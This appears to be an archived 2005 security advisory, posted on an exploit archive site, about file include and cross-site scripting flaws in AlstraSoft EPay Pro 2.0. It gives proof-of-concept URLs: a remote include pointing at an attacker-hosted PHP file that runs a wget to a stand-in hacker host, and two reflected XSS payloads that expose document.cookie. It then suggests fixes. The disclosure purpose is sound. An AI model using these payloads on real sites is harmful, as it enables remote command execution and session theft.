exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AlstraSoft20.txt

AlstraSoft20.txt
Posted Apr 17, 2005
Authored by Diabolic Crab | Site hackerscenter.com

AlstraSoft EPay Pro version 2.0 has file include and multiple cross site scripting flaws.

tags | exploit, xss
SHA-256 | 41a421339fefd9706dbe6b1928fe8c17fa15574d2aad1e7d5d18cba6fb06d018

AlstraSoft20.txt

Change Mirror Download
This is a multi-part message in MIME format.

------=_NextPart_000_0012_01C53726.5C0BF6A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab 's Security Advisory
[Hsc Security Group] https://www.hackerscenter.com/
[dP Security] https://digitalparadox.org/

Severity: High
Title: AlstraSoft EPay Pro v2.0 has file include and multiple xss =
vulnerabilities
Date: 02/04/2005

Vendor: AlstraSoft
Vendor Website: https://www.alstrasoft.com
Summary: Alstrasoft epay pro v2. has file include and multiple xss =
vulnerabilities.

Proof of Concept Exploits:=20

https://localhost/epal/index.php?view=3Dhttps://www.whatismyip.com?
File include vulnerability

Instead of www.whatismyip.com if we replaced that with suppose evil.php =
on www.server.com which contained evil code such as
<?
system('wget https://www.hacker.com");
?>
and we ran, =
https://localhost/epal/index.php?view=3Dhttps://www.server.com/evil it =
would execute the command and thus this can lead to arbitary command =
execution.


https://localhost/epal/?order_num=3Dcrap&payment=3D"><script>alert(documen=
t.cookie)</script>&send=3Dfirst&send=3Dregular&send=3Dpriority&send=3Dexp=
ress
Pops cookie


https://localhost/epal/?order_num=3Dcrap&payment=3Dcrap&send=3Dfirst&send=3D=
regular&send=3Dpriority&send=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/=
script%3E
Pops cookie


Possible Fixes: The usage of htmlspeacialchars(), and using a base =
directory for file include would solve these problems.

Keep your self updated, Rss feed at: https://digitalparadox.org/rss.ah

Author:=20
These vulnerabilties have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
https://www.hackerscenter.com or https://digitalparadox.org/. Lookout for =
my soon to come out book on Secure coding with php.

Diabolic Crab's Security Services: Contact at =
dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web =
application securing services, along with programming in php, vb, asp, =
c, c++, perl, java, html and graphic designing.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQk2p4SZV5e8av/DUEQIWsQCfW213hHs/Bd4QZBoLFufN1NM+AkUAn3Xd
vW9dOgM7AoFDa/JaMgMjaisw
=3Dsb0J
-----END PGP SIGNATURE-----


------=_NextPart_000_0012_01C53726.5C0BF6A0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =
MESSAGE-----<BR>Hash:=20
SHA1</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc =
Security Group]=20
<A =
href=3D"https://www.hackerscenter.com/">https://www.hackerscenter.com/</A><=
BR>[dP=20
Security] <A=20
href=3D"https://digitalparadox.org/">https://digitalparadox.org/</A></FONT>=
</DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: AlstraSoft =
EPay Pro v2.0=20
has file include and multiple xss vulnerabilities<BR>Date:=20
02/04/2005</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: AlstraSoft<BR>Vendor Website: =
<A=20
href=3D"https://www.alstrasoft.com">https://www.alstrasoft.com</A><BR>Summa=
ry:=20
Alstrasoft epay pro v2. has file include and multiple xss=20
vulnerabilities.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits: =
</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"https://localhost/epal/index.php?view=3Dhttps://www.whatismyip.com"=
>https://localhost/epal/index.php?view=3Dhttps://www.whatismyip.com</A>?<BR=
>File=20
include vulnerability</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Instead of <A=20
href=3D"https://www.whatismyip.com">www.whatismyip.com</A> if we replaced =
that with=20
suppose evil.php on <A href=3D"https://www.server.com">www.server.com</A> =
which=20
contained evil code such as<BR><?<BR>system('wget <A=20
href=3D"https://www.hacker.com">https://www.hacker.com</A>");<BR>?><BR>a=
nd we=20
ran, <A=20
href=3D"https://localhost/epal/index.php?view=3Dhttps://www.server.com/evil=
">https://localhost/epal/index.php?view=3Dhttps://www.server.com/evil</A>=20
it would execute the command and thus this can lead to arbitary command=20
execution.</FONT></DIV>
<DIV>&nbsp;</DIV><FONT face=3DArial size=3D2>
<DIV><BR><A=20
href=3D'https://localhost/epal/?order_num=3Dcrap&payment=3D"><script>a=
lert(document.cookie)</script>&send=3Dfirst&send=3Dregular&se=
nd=3Dpriority&send=3Dexpress'>https://localhost/epal/?order_num=3Dcrap=
&payment=3D"><script>alert(document.cookie)</script>&a=
mp;send=3Dfirst&send=3Dregular&send=3Dpriority&send=3Dexpress=
</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"https://localhost/epal/?order_num=3Dcrap&payment=3Dcrap&se=
nd=3Dfirst&send=3Dregular&send=3Dpriority&send=3D'%3E%3Cscrip=
t%3Ealert(document.cookie)%3C/script%3E">https://localhost/epal/?order_num=
=3Dcrap&payment=3Dcrap&send=3Dfirst&send=3Dregular&send=3D=
priority&send=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</=
A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(), and using a =
base=20
directory for file include would solve these problems.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Keep your self updated, Rss feed at: <A=20
href=3D"https://digitalparadox.org/rss.ah">https://digitalparadox.org/rss.a=
h</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>Author: <BR>These vulnerabilties have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"https://www.hackerscenter.com">https://www.hackerscenter.com</A> =
or <A=20
href=3D"https://digitalparadox.org/">https://digitalparadox.org/</A>. =
Lookout for my=20
soon to come out book on Secure coding with php.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Diabolic Crab's Security Services: Contact at=20
dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web=20
application securing services, along with programming in php, vb, asp, =
c, c++,=20
perl, java, html and graphic designing.</DIV>
<DIV>&nbsp;</DIV>
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =
for=20
commercial use: <A href=3D"https://www.pgp.com">www.pgp.com</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>iQA/AwUBQk2p4SZV5e8av/DUEQIWsQCfW213hHs/Bd4QZBoLFufN1NM+AkUAn3Xd<BR>=
vW9dOgM7AoFDa/JaMgMjaisw<BR>=3Dsb0J<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV></BODY></HTML>

------=_NextPart_000_0012_01C53726.5C0BF6A0--
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close